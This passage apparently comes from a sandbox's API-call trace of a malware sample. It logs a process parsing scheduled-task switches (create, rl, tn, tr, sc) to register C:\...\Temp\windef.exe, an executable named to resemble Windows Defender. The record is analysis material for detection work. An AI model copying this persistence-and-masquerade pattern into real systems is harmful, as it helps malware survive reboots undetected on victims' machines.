_Buf2=0x3a2708, _Size=0x7) returned 0 [0176.776] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0176.776] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.776] lstrlenW (lpString="|d|") returned 3 [0176.776] lstrlenW (lpString="|tr|") returned 4 [0176.776] RtlRestoreLastWin32Error () returned 0x490 [0176.776] lstrlenW (lpString="m") returned 1 [0176.776] lstrlenW (lpString="m") returned 1 [0176.777] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.777] lstrlenW (lpString="tr") returned 2 [0176.777] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.777] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0176.777] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.777] lstrlenW (lpString="|m|") returned 3 [0176.777] lstrlenW (lpString="|tr|") returned 4 [0176.777] RtlRestoreLastWin32Error () returned 0x490 [0176.777] lstrlenW (lpString="i") returned 1 [0176.777] lstrlenW (lpString="i") returned 1 [0176.777] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.777] lstrlenW (lpString="tr") returned 2 [0176.777] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.777] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0176.777] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.777] lstrlenW (lpString="|i|") returned 3 [0176.777] lstrlenW (lpString="|tr|") returned 4 [0176.777] RtlRestoreLastWin32Error () returned 0x490 [0176.778] lstrlenW (lpString="tn") returned 2 [0176.778] lstrlenW (lpString="tn") returned 2 [0176.778] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.778] lstrlenW (lpString="tr") returned 2 [0176.778] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.778] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.778] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.778] lstrlenW (lpString="|tn|") returned 4 [0176.778] lstrlenW (lpString="|tr|") returned 4 [0176.778] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0176.778] RtlRestoreLastWin32Error () returned 0x490 [0176.778] lstrlenW (lpString="tr") returned 2 [0176.778] lstrlenW (lpString="tr") returned 2 [0176.778] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.778] lstrlenW (lpString="tr") returned 2 [0176.778] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.778] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.778] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.778] lstrlenW (lpString="|tr|") returned 4 [0176.778] lstrlenW (lpString="|tr|") returned 4 [0176.778] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0176.778] RtlRestoreLastWin32Error () returned 0x0 [0176.778] RtlRestoreLastWin32Error () returned 0x0 [0176.778] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.779] lstrlenW (lpString="-/") returned 2 [0176.779] StrChrIW (lpStart="-/", wMatch=0x300043) returned 0x0 [0176.779] RtlRestoreLastWin32Error () returned 0x490 [0176.779] RtlRestoreLastWin32Error () returned 0x490 [0176.779] RtlRestoreLastWin32Error () returned 0x0 [0176.779] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.779] StrChrIW (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe", wMatch=0x3a) returned=":\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe" [0176.779] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.779] _memicmp (_Buf1=0x47c7670, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.779] _memicmp (_Buf1=0x47cabb8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.779] RtlRestoreLastWin32Error () returned 0x7a [0176.779] RtlRestoreLastWin32Error () returned 0x0 [0176.779] RtlRestoreLastWin32Error () returned 0x0 [0176.779] lstrlenW (lpString="C") returned 1 [0176.779] RtlRestoreLastWin32Error () returned 0x490 [0176.779] RtlRestoreLastWin32Error () returned 0x0 [0176.779] _memicmp (_Buf1=0x47cac48, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.779] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.779] GetProcessHeap () returned 0x47c0000 [0176.779] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cabe8) returned 1 [0176.779] GetProcessHeap () returned 0x47c0000 [0176.779] RtlReAllocateHeap (Heap=0x47c0000, Flags=0xc, Ptr=0x47cabe8, Size=0x60) returned 0x47cadd0 [0176.779] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.779] lstrlenW (lpString=" \x09") returned 2 [0176.779] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0176.779] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x4a) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x7e) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0176.780] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0176.781] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0176.782] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0176.782] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0176.782] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0176.782] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0176.782] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0176.782] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0176.782] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0176.782] GetLastError () returned 0x0 [0176.782] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.782] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0176.782] RtlRestoreLastWin32Error () returned 0x0 [0176.782] RtlRestoreLastWin32Error () returned 0x0 [0176.782] lstrlenW (lpString="/rl") returned 3 [0176.782] lstrlenW (lpString="-/") returned 2 [0176.782] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.782] lstrlenW (lpString="create") returned 6 [0176.782] lstrlenW (lpString="create") returned 6 [0176.782] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.782] lstrlenW (lpString="rl") returned 2 [0176.782] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.782] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0176.782] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.782] lstrlenW (lpString="|create|") returned 8 [0176.783] lstrlenW (lpString="|rl|") returned 4 [0176.783] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0176.783] RtlRestoreLastWin32Error () returned 0x490 [0176.783] lstrlenW (lpString="?") returned 1 [0176.783] lstrlenW (lpString="?") returned 1 [0176.783] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.783] lstrlenW (lpString="rl") returned 2 [0176.783] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.783] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0176.783] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.783] lstrlenW (lpString="|?|") returned 3 [0176.783] lstrlenW (lpString="|rl|") returned 4 [0176.783] RtlRestoreLastWin32Error () returned 0x490 [0176.783] lstrlenW (lpString="s") returned 1 [0176.783] lstrlenW (lpString="s") returned 1 [0176.783] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.783] lstrlenW (lpString="rl") returned 2 [0176.783] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.783] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0176.783] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.783] lstrlenW (lpString="|s|") returned 3 [0176.783] lstrlenW (lpString="|rl|") returned 4 [0176.784] RtlRestoreLastWin32Error () returned 0x490 [0176.784] lstrlenW (lpString="u") returned 1 [0176.784] lstrlenW (lpString="u") returned 1 [0176.784] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.784] lstrlenW (lpString="rl") returned 2 [0176.784] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.784] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0176.784] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.784] lstrlenW (lpString="|u|") returned 3 [0176.784] lstrlenW (lpString="|rl|") returned 4 [0176.784] RtlRestoreLastWin32Error () returned 0x490 [0176.784] lstrlenW (lpString="p") returned 1 [0176.784] lstrlenW (lpString="p") returned 1 [0176.784] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.784] lstrlenW (lpString="rl") returned 2 [0176.784] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.784] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0176.784] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.784] lstrlenW (lpString="|p|") returned 3 [0176.784] lstrlenW (lpString="|rl|") returned 4 [0176.784] RtlRestoreLastWin32Error () returned 0x490 [0176.784] lstrlenW (lpString="ru") returned 2 [0176.784] lstrlenW (lpString="ru") returned 2 [0176.784] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.784] lstrlenW (lpString="rl") returned 2 [0176.784] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.785] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0176.785] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.785] lstrlenW (lpString="|ru|") returned 4 [0176.785] lstrlenW (lpString="|rl|") returned 4 [0176.785] StrStrIW (lpFirst="|ru|", lpSrch="|rl|") returned 0x0 [0176.785] RtlRestoreLastWin32Error () returned 0x490 [0176.785] lstrlenW (lpString="rp") returned 2 [0176.785] lstrlenW (lpString="rp") returned 2 [0176.785] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.785] lstrlenW (lpString="rl") returned 2 [0176.785] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.785] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0176.786] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.786] lstrlenW (lpString="|rp|") returned 4 [0176.786] lstrlenW (lpString="|rl|") returned 4 [0176.786] StrStrIW (lpFirst="|rp|", lpSrch="|rl|") returned 0x0 [0176.786] RtlRestoreLastWin32Error () returned 0x490 [0176.786] lstrlenW (lpString="sc") returned 2 [0176.786] lstrlenW (lpString="sc") returned 2 [0176.786] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.786] lstrlenW (lpString="rl") returned 2 [0176.786] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.786] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.786] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.786] lstrlenW (lpString="|sc|") returned 4 [0176.786] lstrlenW (lpString="|rl|") returned 4 [0176.786] StrStrIW (lpFirst="|sc|", lpSrch="|rl|") returned 0x0 [0176.786] RtlRestoreLastWin32Error () returned 0x490 [0176.786] lstrlenW (lpString="mo") returned 2 [0176.786] lstrlenW (lpString="mo") returned 2 [0176.787] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.787] lstrlenW (lpString="rl") returned 2 [0176.787] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.787] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0176.787] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.787] lstrlenW (lpString="|mo|") returned 4 [0176.787] lstrlenW (lpString="|rl|") returned 4 [0176.787] StrStrIW (lpFirst="|mo|", lpSrch="|rl|") returned 0x0 [0176.787] RtlRestoreLastWin32Error () returned 0x490 [0176.787] lstrlenW (lpString="d") returned 1 [0176.787] lstrlenW (lpString="d") returned 1 [0176.787] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.787] lstrlenW (lpString="rl") returned 2 [0176.787] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.787] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0176.787] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.787] lstrlenW (lpString="|d|") returned 3 [0176.788] lstrlenW (lpString="|rl|") returned 4 [0176.788] RtlRestoreLastWin32Error () returned 0x490 [0176.788] lstrlenW (lpString="m") returned 1 [0176.788] lstrlenW (lpString="m") returned 1 [0176.788] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.788] lstrlenW (lpString="rl") returned 2 [0176.788] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.788] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0176.788] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.788] lstrlenW (lpString="|m|") returned 3 [0176.788] lstrlenW (lpString="|rl|") returned 4 [0176.788] RtlRestoreLastWin32Error () returned 0x490 [0176.788] lstrlenW (lpString="i") returned 1 [0176.788] lstrlenW (lpString="i") returned 1 [0176.788] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.788] lstrlenW (lpString="rl") returned 2 [0176.789] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.789] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0176.789] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.789] lstrlenW (lpString="|i|") returned 3 [0176.789] lstrlenW (lpString="|rl|") returned 4 [0176.789] RtlRestoreLastWin32Error () returned 0x490 [0176.789] lstrlenW (lpString="tn") returned 2 [0176.789] lstrlenW (lpString="tn") returned 2 [0176.789] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.789] lstrlenW (lpString="rl") returned 2 [0176.789] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.789] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.789] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.789] lstrlenW (lpString="|tn|") returned 4 [0176.789] lstrlenW (lpString="|rl|") returned 4 [0176.789] StrStrIW (lpFirst="|tn|", lpSrch="|rl|") returned 0x0 [0176.789] RtlRestoreLastWin32Error () returned 0x490 [0176.789] lstrlenW (lpString="tr") returned 2 [0176.790] lstrlenW (lpString="tr") returned 2 [0176.790] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.790] lstrlenW (lpString="rl") returned 2 [0176.790] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.790] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.790] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.790] lstrlenW (lpString="|tr|") returned 4 [0176.790] lstrlenW (lpString="|rl|") returned 4 [0176.790] StrStrIW (lpFirst="|tr|", lpSrch="|rl|") returned 0x0 [0176.790] RtlRestoreLastWin32Error () returned 0x490 [0176.790] lstrlenW (lpString="st") returned 2 [0176.790] lstrlenW (lpString="st") returned 2 [0176.790] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.790] lstrlenW (lpString="rl") returned 2 [0176.791] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.791] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4 [0176.791] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.791] lstrlenW (lpString="|st|") returned 4 [0176.791] lstrlenW (lpString="|rl|") returned 4 [0176.791] StrStrIW (lpFirst="|st|", lpSrch="|rl|") returned 0x0 [0176.791] RtlRestoreLastWin32Error () returned 0x490 [0176.791] lstrlenW (lpString="sd") returned 2 [0176.791] lstrlenW (lpString="sd") returned 2 [0176.791] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.791] lstrlenW (lpString="rl") returned 2 [0176.791] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.791] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4 [0176.792] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.792] lstrlenW (lpString="|sd|") returned 4 [0176.792] lstrlenW (lpString="|rl|") returned 4 [0176.792] StrStrIW (lpFirst="|sd|", lpSrch="|rl|") returned 0x0 [0176.792] RtlRestoreLastWin32Error () returned 0x490 [0176.792] lstrlenW (lpString="ed") returned 2 [0176.792] lstrlenW (lpString="ed") returned 2 [0176.792] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.792] lstrlenW (lpString="rl") returned 2 [0176.792] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.792] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4 [0176.792] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.792] lstrlenW (lpString="|ed|") returned 4 [0176.792] lstrlenW (lpString="|rl|") returned 4 [0176.792] StrStrIW (lpFirst="|ed|", lpSrch="|rl|") returned 0x0 [0176.792] RtlRestoreLastWin32Error () returned 0x490 [0176.792] lstrlenW (lpString="it") returned 2 [0176.792] lstrlenW (lpString="it") returned 2 [0176.792] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.792] lstrlenW (lpString="rl") returned 2 [0176.792] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.792] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4 [0176.792] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.792] lstrlenW (lpString="|it|") returned 4 [0176.792] lstrlenW (lpString="|rl|") returned 4 [0176.793] StrStrIW (lpFirst="|it|", lpSrch="|rl|") returned 0x0 [0176.793] RtlRestoreLastWin32Error () returned 0x490 [0176.793] lstrlenW (lpString="et") returned 2 [0176.793] lstrlenW (lpString="et") returned 2 [0176.793] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.793] lstrlenW (lpString="rl") returned 2 [0176.793] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.793] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4 [0176.793] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.793] lstrlenW (lpString="|et|") returned 4 [0176.793] lstrlenW (lpString="|rl|") returned 4 [0176.793] StrStrIW (lpFirst="|et|", lpSrch="|rl|") returned 0x0 [0176.793] RtlRestoreLastWin32Error () returned 0x490 [0176.793] lstrlenW (lpString="k") returned 1 [0176.793] lstrlenW (lpString="k") returned 1 [0176.793] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.793] lstrlenW (lpString="rl") returned 2 [0176.793] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.793] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3 [0176.793] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.793] lstrlenW (lpString="|k|") returned 3 [0176.793] lstrlenW (lpString="|rl|") returned 4 [0176.793] RtlRestoreLastWin32Error () returned 0x490 [0176.793] lstrlenW (lpString="du") returned 2 [0176.793] lstrlenW (lpString="du") returned 2 [0176.794] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.794] lstrlenW (lpString="rl") returned 2 [0176.794] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.794] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4 [0176.794] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0176.794] lstrlenW (lpString="|du|") returned 4 [0176.794] lstrlenW (lpString="|rl|") returned 4 [0176.794] StrStrIW (lpFirst="|du|", lpSrch="|rl|") returned 0x0 [0176.794] RtlRestoreLastWin32Error () returned 0x490 [0176.794] lstrlenW (lpString="ri") returned 2 [0176.794] lstrlenW (lpString="ri") returned 2 [0176.794] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.794] lstrlenW (lpString="rl") returned 2 [0176.794] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.794] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4 [0176.794] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, 